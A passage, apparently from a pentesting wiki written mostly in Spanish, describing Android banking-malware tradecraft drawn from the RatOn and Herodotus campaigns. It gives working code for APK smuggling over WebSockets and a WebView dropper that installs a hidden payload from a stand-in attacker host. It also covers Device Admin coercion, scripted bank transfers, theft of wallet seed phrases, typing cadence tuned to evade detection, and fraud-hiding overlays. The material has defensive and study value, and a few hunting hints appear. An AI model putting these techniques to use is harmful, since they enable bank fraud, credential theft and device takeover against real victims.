// Accumulate binary chunks and drive fake Play progress UI const chunks = []; socket.on(“chunk”, (chunk) => chunks.push(chunk)); socket.on(“downloadProgress”, (p) => updateProgressBar(p));

// Assemble APK client‑side and trigger browser save dialog socket.on(“downloadComplete”, () => { const blob = new Blob(chunks, { type: “application/vnd.android.package-archive” }); const url = URL.createObjectURL(blob); const a = document.createElement(“a”); a.href = url; a.download = “app.apk”; a.style.display = “none”; document.body.appendChild(a); a.click(); });

</details>

Por qué evade controles simples:
- No se expone una URL APK estática; la payload se reconstruye en memoria a partir de frames de WebSocket.
- Los filtros URL/MIME/extensión que bloquean respuestas directas .apk pueden pasar por alto datos binarios tunelizados vía WebSockets/Socket.IO.
- Los crawlers y los URL sandboxes que no ejecutan WebSockets no recuperarán la payload.

Véase también WebSocket tradecraft and tooling:

<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>


## Abuso de Android Accessibility/Overlay y Device Admin, automatización ATS y orquestación de relay NFC – estudio de caso RatOn

La campaña RatOn banker/RAT (ThreatFabric) es un ejemplo concreto de cómo las operaciones modernas de phishing móvil combinan WebView droppers, automatización de UI impulsada por Accessibility, overlays/ransom, coerción mediante Device Admin, Automated Transfer System (ATS), takeover de crypto wallets e incluso orquestación de relay NFC. Esta sección abstrae las técnicas reutilizables.

### Stage-1: WebView → puente de instalación nativa (dropper)
Los atacantes muestran un WebView que apunta a una página atacante e inyectan una interfaz JavaScript que expone un instalador nativo. Un toque en un botón HTML llama a código nativo que instala un APK de segunda etapa incluido en los assets del dropper y luego lo lanza directamente.

Patrón mínimo:

<details>
<summary>Patrón mínimo del dropper Stage-1 (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}

HTML en la página:

<button onclick="bridge.installApk()">Install</button>

Después de la instalación, el dropper inicia el payload mediante explicit package/activity:

Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);

Hunting idea: untrusted apps calling addJavascriptInterface() and exposing installer-like methods to WebView; APK shipping an embedded secondary payload under assets/ and invoking the Package Installer Session API.

Embudo de consentimiento: Accessibility + Device Admin + solicitudes de permisos en tiempo de ejecución posteriores

Stage-2 opens a WebView that hosts an “Access” page. Its button invokes an exported method that navigates the victim to the Accessibility settings and requests enabling the rogue service. Once granted, malware uses Accessibility to auto-click through subsequent runtime permission dialogs (contacts, overlay, manage system settings, etc.) and requests Device Admin.

• Accessibility programáticamente ayuda a aceptar las solicitudes posteriores encontrando botones como “Allow”/“OK” en el árbol de nodos y despachando clics.
• Comprobación/solicitud del permiso overlay:

if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}

See also:

Accessibility Services Abuse

Phishing/chantaje por overlay vía WebView

Los operadores pueden emitir comandos para:

• mostrar un overlay a pantalla completa desde una URL, o
• pasar HTML inline que se carga en un overlay WebView.

Usos probables: coerción (ingreso de PIN), apertura de wallet para capturar PINs, mensajes de chantaje. Mantener un comando para asegurar que el permiso de overlay esté concedido si falta.

Modelo de control remoto – pseudo-pantalla de texto + screen-cast

• Bajo ancho de banda: volcar periódicamente el árbol de nodos de Accessibility, serializar textos/roles/bounds visibles y enviarlos al C2 como una pseudo-pantalla (comandos como txt_screen una vez y screen_live continuo).
• Alta fidelidad: solicitar MediaProjection y empezar screen-casting/recording bajo demanda (comandos como display / record).

ATS playbook (automatización de app bancaria)

Dada una tarea en JSON, abrir la app bancaria, controlar la UI vía Accessibility con una mezcla de consultas de texto y toques por coordenadas, e introducir el PIN de pago de la víctima cuando se solicite.

Ejemplo de tarea:

{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}

Textos de ejemplo vistos en un flujo objetivo (CZ → EN):

• “Nová platba” → “Nuevo pago”
• “Zadat platbu” → “Ingresar pago”
• “Nový příjemce” → “Nuevo destinatario”
• “Domácí číslo účtu” → “Número de cuenta nacional”
• “Další” → “Siguiente”
• “Odeslat” → “Enviar”
• “Ano, pokračovat” → “Sí, continuar”
• “Zaplatit” → “Pagar”
• “Hotovo” → “Hecho”

Los operadores también pueden comprobar/aumentar los límites de transferencia mediante comandos como check_limit y limit que navegan por la UI de límites de forma similar.

Crypto wallet seed extraction

Targets like MetaMask, Trust Wallet, Blockchain.com, Phantom. Flujo: desbloquear (PIN robado o contraseña proporcionada), navegar a Security/Recovery, revelar/mostrar seed phrase, keylog/exfiltrate it. Implementar selectores conscientes de la localización (EN/RU/CZ/SK) para estabilizar la navegación entre idiomas.

Device Admin coercion

Device Admin APIs se usan para aumentar las oportunidades de PIN-capture y para frustrar a la víctima:

• Bloqueo inmediato:

dpm.lockNow();

• Expirar la credencial actual para forzar el cambio (Accessibility captura el nuevo PIN/contraseña):

dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner

• Forzar el desbloqueo no biométrico deshabilitando las funciones biométricas de keyguard:

dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);

Nota: Many DevicePolicyManager controls require Device Owner/Profile Owner on recent Android; some OEM builds may be lax. Always validate on target OS/OEM.

NFC relay orchestration (NFSkate)

Stage-3 can install and launch an external NFC-relay module (e.g., NFSkate) and even hand it an HTML template to guide the victim during the relay. This enables contactless card-present cash-out alongside online ATS.

Background: NFSkate NFC relay.

Operator command set (sample)

• UI/estado: txt_screen, screen_live, display, record
• Social: send_push, Facebook, WhatsApp
• Superposiciones: overlay (HTML en línea), block (URL), block_off, access_tint
• Billeteras: metamask, trust, blockchain, phantom
• ATS: transfer, check_limit, limit
• Dispositivo: lock, expire_password, disable_keyguard, home, back, recents, power, touch, swipe, keypad, tint, sound_mode, set_sound
• Comunicaciones/Recon: update_device, send_sms, replace_buffer, get_name, add_contact
• NFC: nfs, nfs_inject

Accessibility-driven ATS anti-detection: human-like text cadence and dual text injection (Herodotus)

Threat actors increasingly blend Accessibility-driven automation with anti-detection tuned against basic behaviour biometrics. A recent banker/RAT shows two complementary text-delivery modes and an operator toggle to simulate human typing with randomized cadence.

• Modo de descubrimiento: enumerar nodos visibles con selectores y bounds para apuntar con precisión a los inputs (ID, text, contentDescription, hint, bounds) antes de actuar.
• Inyección dual de texto:
• Modo 1 – ACTION_SET_TEXT directamente sobre el nodo objetivo (estable, sin teclado);
• Modo 2 – poner en el portapapeles + ACTION_PASTE en el nodo enfocado (funciona cuando setText directo está bloqueado).
• Cadencia similar a la humana: dividir la cadena proporcionada por el operador y entregarla carácter por carácter con retrasos aleatorios de 300–3000 ms entre eventos para evadir heurísticas de “escritura a velocidad de máquina”. Implementado ya sea aumentando progresivamente el valor vía ACTION_SET_TEXT, o pegando un carácter a la vez.

</details>

Overlays de bloqueo para encubrir fraude:
- Renderiza un `TYPE_ACCESSIBILITY_OVERLAY` a pantalla completa con opacidad controlada por el operador; mantenlo opaco para la víctima mientras la automatización remota se ejecuta por debajo.
- Comandos típicamente expuestos: `opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.

Overlay mínimo con alfa ajustable:
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);